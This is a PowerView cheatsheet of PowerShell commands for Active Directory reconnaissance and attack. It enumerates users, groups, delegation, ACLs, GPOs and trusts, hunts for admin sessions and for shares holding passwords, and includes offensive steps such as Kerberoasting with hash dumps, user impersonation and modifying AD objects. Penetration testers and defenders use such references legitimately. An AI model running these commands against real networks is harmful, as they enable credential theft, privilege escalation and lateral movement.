Powerview Cheatsheet
Powerful PowerShell module for Active Directory enumeration, with some functions that go beyond enumeration into attack/exploitation steps
Users
# count the domain users
$ (Get-DomainUser).count
# return some properties for a user and export to CSV
$ Get-DomainUser -Identity $USER -Domain $DOMAIN | Select-Object -Property name,samaccountname,description,memberof,whencreated,pwdlastset,lastlogontimestamp,accountexpires,admincount,userprincipalname,serviceprincipalname,mail,useraccountcontrol | Export-Csv .\inlanefreight_users.csv -NoTypeInformation
# return users with PreAuth disabled
$ Get-DomainUser -KerberosPreauthNotRequired -Properties samaccountname,useraccountcontrol,memberof
# return users with Constrained Delegation
$ Get-DomainUser -TrustedToAuth -Properties samaccountname,useraccountcontrol,memberof
# users with Unconstrained Delegation
$ .\SharpView.exe Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=524288)"
# return domain users whose description field is non-empty (descriptions sometimes contain a password)
$ Get-DomainUser -Properties samaccountname,description | Where {$_.description -ne $null}
# enumerate users with SPNs
$ Get-DomainUser -SPN -Properties samaccountname,memberof,serviceprincipalname
# find users from other domains
$ Find-ForeignGroup
# return users with their pwdlastset and lastlogon, sorted by pwdlastset (note: lastlogon is per-DC and not replicated, lastlogontimestamp is the replicated attribute)
$ Get-DomainUser -Properties samaccountname,pwdlastset,lastlogon -Domain $DOMAIN | select samaccountname, pwdlastset, lastlogon | Sort-Object -Property pwdlastset
# show users whose password was last set more than 90 days ago
$ Get-DomainUser -Properties samaccountname,pwdlastset,lastlogon -Domain $DOMAIN | select samaccountname, pwdlastset, lastlogon | where { $_.pwdlastset -lt (Get-Date).addDays(-90) }
# convert username to SID
$ ConvertTo-SID -Name $USER
# convert SID to username
$ Convert-ADName -ObjectName S-1-5-21-921xxxxxxxxxx-x-xx-1724
# convert the numeric useraccountcontrol value to readable flags; -showall lists every flag and marks the ones that are set with a +
$ Get-DomainUser $USER | ConvertFrom-UACValue -showall
Groups
# get all domain groups
$ Get-DomainGroup -Properties Name
# get members of a group (quote names containing spaces; in PowerShell single quotes do not expand $variables, so substitute the real group name)
$ Get-DomainGroupMember -Identity '$GROUP'
# get members of a group recursively (nested groups)
$ Get-DomainGroupMember -Identity '$GROUP' -Recurse
# get protected groups (AdminCount set)
$ Get-DomainGroup -AdminCount
# get all groups a user is a member of
$ Get-DomainGroup -UserName $USER
# list managed security groups
$ Find-ManagedSecurityGroups | select GroupName
# get groups and their group manager
$ Get-DomainManagedSecurityGroup
# check which ACEs on a group apply to a given principal (e.g. the group's manager)
$ $sid = ConvertTo-SID $USER; Get-DomainObjectAcl -Identity '$GROUP' | ?{$_.SecurityIdentifier -eq $sid}
# list local group names on a remote machine
$ Get-NetLocalGroup -ComputerName $FQDN | select GroupName
# get members of all local groups on a remote machine
$ Get-NetLocalGroupMember -ComputerName $FQDN
# find all hosts where a user is a direct member of the local Administrators group (Get-NetLocalGroupMember defaults to Administrators; queries every domain computer)
$ $sid = Convert-NameToSid $USER; $computers = Get-DomainComputer -Properties dnshostname | select -ExpandProperty dnshostname; foreach ($line in $computers) {Get-NetLocalGroupMember -ComputerName $line | ?{$_.SID -eq $sid}}
# get when a user was added to a group
$ Import-Module Get-ADGroupMemberDate.ps1; Get-ADGroupMemberDate -Group '$GROUP' -DomainController $FQDN | ? { ($_.Username -match $USER) -And ($_.State -NotMatch 'ABSENT' ) }
Computers
# list all computers with hostname, OS, last logon, UAC
$ Get-DomainComputer -Properties dnshostname,operatingsystem,lastlogontimestamp,useraccountcontrol
# export computers to CSV
$ Get-DomainComputer -Properties dnshostname,operatingsystem,lastlogontimestamp,useraccountcontrol | Export-Csv .\computers.csv -NoTypeInformation
# list computers with unconstrained delegation
$ Get-DomainComputer -Unconstrained -Properties dnshostname,useraccountcontrol
# list computers with constrained delegation
$ Get-DomainComputer -TrustedToAuth | select -Property dnshostname,useraccountcontrol
# return all domain controllers in the current domain
$ Get-DomainController
# return all domain controllers for a specified domain
$ Get-DomainController -Domain $DOMAIN
# return users actively logged on to a remote machine (requires admin)
$ Get-NetLoggedon -ComputerName $FQDN
# return session information on a remote machine
$ Get-NetSession -ComputerName $FQDN
# return who is logged on via remote registry enumeration (stealthier)
$ Get-RegLoggedOn -ComputerName $FQDN
# return active RDP sessions on a remote machine
$ Get-NetRDPSession -ComputerName $FQDN
# test if current user has local admin access on a remote machine
$ Test-AdminAccess -ComputerName $FQDN
# test admin access across all domain machines
$ Get-DomainComputer | Test-AdminAccess
# return the last user who logged onto a remote machine via registry
$ Get-WMIRegLastLoggedOn -ComputerName $FQDN
# return cached outgoing RDP connections from a remote machine
$ Get-WMIRegCachedRDPConnection -ComputerName $FQDN
# return saved network drives on a remote machine
$ Get-WMIRegMountedDrive -ComputerName $FQDN
# return running processes and their owners on a remote machine
$ Get-WMIProcess -ComputerName $FQDN
Domain
# return information about the domain (name, child domains, DCs, roles)
$ Get-Domain
# list domain OUs
$ Get-DomainOU | findstr /b "name"
# return the SID of the current domain
$ Get-DomainSID
# return the forest object (name, root domain, child domains)
$ Get-Forest
# return all domains within the current forest
$ Get-ForestDomain
# return all global catalog servers in the forest
$ Get-ForestGlobalCatalog
# enumerate all DNS zones in the domain
$ Get-DomainDNSZone
# enumerate all DNS records within a specific zone
$ Get-DomainDNSRecord -ZoneName $DOMAIN
# return likely file servers in the domain
$ Get-DomainFileServer
# return all DFS shares in the domain
$ Get-DomainDFSShare
# return all subnets defined in AD Sites and Services
$ Get-DomainSubnet
# return the default domain password policy
$ Get-DomainPolicy
# return the domain controller policy
$ Get-DomainPolicy -Policy DC
# show the password/lockout policy using net accounts (without /domain this reports the local machine's policy; add /domain for the domain policy)
$ net accounts
ACLs
# get ACLs for a specific AD object
$ Get-DomainObjectAcl -Identity $USER -ResolveGUIDs
# find ACLs across the domain where non-default principals have modification rights
$ Find-InterestingDomainAcl -ResolveGUIDs
# get ACLs for a specific domain user using the ActiveDirectory (RSAT) module cmdlets instead of PowerView
$ (Get-ACL "AD:$((Get-ADUser $USER).distinguishedname)" ).access | ? {$_.IdentityReference -eq "$DOMAIN\$USER" }
# find all users with WriteProperty or GenericAll over a target user
$ (Get-ACL "AD:$((Get-ADUser $USER).distinguishedname)" ).access | ? {$_.ActiveDirectoryRights -match "WriteProperty" -or $_.ActiveDirectoryRights -match "GenericAll" } | Select IdentityReference,ActiveDirectoryRights -Unique | ft -W
# find all users with DCSync rights over the domain object
$ $dcsync = Get-ObjectACL "DC=$DOMAIN,DC=local" -ResolveGUIDs | ? { ($_.ActiveDirectoryRights -match 'GenericAll' ) -or ($_.ObjectAceType -match 'Replication-Get' )} | Select-Object -ExpandProperty SecurityIdentifier | Select -ExpandProperty value; Convert-SidToName $dcsync
# list the shares on a remote machine, then get the ACL of a specific share path
$ Get-NetShare -ComputerName $FQDN; Get-PathAcl "\\$FQDN\$SHARE"
GPOs
# return all GPOs in the domain
$ Get-DomainGPO | select displayname
# return GPOs applied to a specific machine
$ Get-DomainGPO -ComputerName $FQDN | select displayname
# get GPO results for a user
$ gpresult /r /user:$USER
# get GPO results for a remote machine
$ gpresult /r /S $FQDN
# output GPO results to HTML
$ gpresult /h something.html
# find GPOs where the Domain Users group has an ACE (RID 513; the domain SID prefix shown is example-specific, replace it with your own domain SID from Get-DomainSID)
$ Get-DomainGPO | Get-ObjectAcl | ? {$_.SecurityIdentifier -eq 'S-1-5-21-2974783224-3764228556-2640795941-513' }
# get a GPO (including its display name) by GUID; Get-GPO comes from the GroupPolicy module, not PowerView
$ Get-GPO -Guid $GUID
# return all GPOs that modify local group memberships
$ Get-DomainGPOLocalGroup
# find all machines where a specific user/group is local admin through GPO
$ Get-DomainGPOUserLocalGroupMapping -Identity $USER
# find all machines and the users/groups that are mapped into the local Administrators group via GPO
$ Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators
# return what users/groups are local admins on a machine via GPO
$ Get-DomainGPOComputerLocalGroupMapping -ComputerIdentity $FQDN
Trusts
# return all trusts for the current domain
$ Get-DomainTrust
# return trusts for a specific domain
$ Get-DomainTrust -Domain $DOMAIN
# return all forest-level trusts
$ Get-ForestTrust
# map all trusts recursively across every domain found
$ Get-DomainTrustMapping
# return users that belong to groups in other domains
$ Get-DomainForeignUser
# return groups that contain members from outside the group's domain
$ Get-DomainForeignGroupMember
# return foreign group members from a specific domain
$ Get-DomainForeignGroupMember -Domain $DOMAIN
Hunting
# find machines where Domain Admins are currently logged in
$ Find-DomainUserLocation -GroupName "Domain Admins"
# find machines where a specific user is logged in
$ Find-DomainUserLocation -UserName $USER
# stealth version - checks via file server/DC sessions only
$ Find-DomainUserLocation -Stealth
# find machines running a specific process
$ Find-DomainProcess -ProcessName "mimikatz.exe"
# find machines where a specific user owns a running process
$ Find-DomainProcess -UserName $USER
# find logon events for a specific user across the domain
$ Find-DomainUserEvent -UserName $USER
# find all reachable shares across domain machines
$ Find-DomainShare
# find shares across domain machines, keeping only those the current user can actually access
$ Find-DomainShare -CheckShareAccess
# search readable shares across the domain for interesting files
$ Find-InterestingDomainShareFile
# search for specific file patterns across all readable domain shares
$ Find-InterestingDomainShareFile -Include *.xml,*.ini,*.txt,*.config
# find all machines where current user has local admin access
$ Find-LocalAdminAccess
# enumerate local Administrators group members across all domain machines
$ Find-DomainLocalGroupMember -GroupName Administrators
# search for interesting files in a share
$ Find-InterestingFile -Path \\$FQDN\SYSVOL -Include *.xml,*.ini,*.config
# search for files containing sensitive keywords in a share
$ Find-InterestingFile -Path \\$FQDN\IT -SearchTerms "password" ,"creds","secret"
Misc
# request a Kerberos ticket for a specific SPN
$ Get-DomainSPNTicket -SPN "MSSQLSvc/$FQDN:1433"
# find all kerberoastable accounts and dump their ticket hashes
$ Invoke-Kerberoast -OutputFormat Hashcat | Select-Object -ExpandProperty Hash
# get ACLs for a file or share path
$ Get-PathAcl -Path \\$FQDN\SYSVOL
# export domain users to CSV in a thread-safe manner
$ Get-DomainUser | Export-PowerViewCSV -Path C:\output\users.csv
# mount a connection to a remote share using provided credentials
$ Add-RemoteConnection -Path \\$FQDN\C$ -Credential $cred
# remove a previously mounted remote connection
$ Remove-RemoteConnection -Path \\$FQDN\C$
# impersonate another user using runas /netonly style logon
$ Invoke-UserImpersonation -Credential $cred
# revert back to original token after impersonation
$ Invoke-RevertToSelf
# resolve hostname to IP
$ Resolve-IPAddress $FQDN
# return a domain object of any class (user, group, computer, ...) and its properties
$ Get-DomainObject -Identity $USER
# modify a property on a domain object (this is a write to AD, not enumeration: it requires write rights on the object and is replicated and auditable)
$ Set-DomainObject -Identity $USER -Set @{description="test"}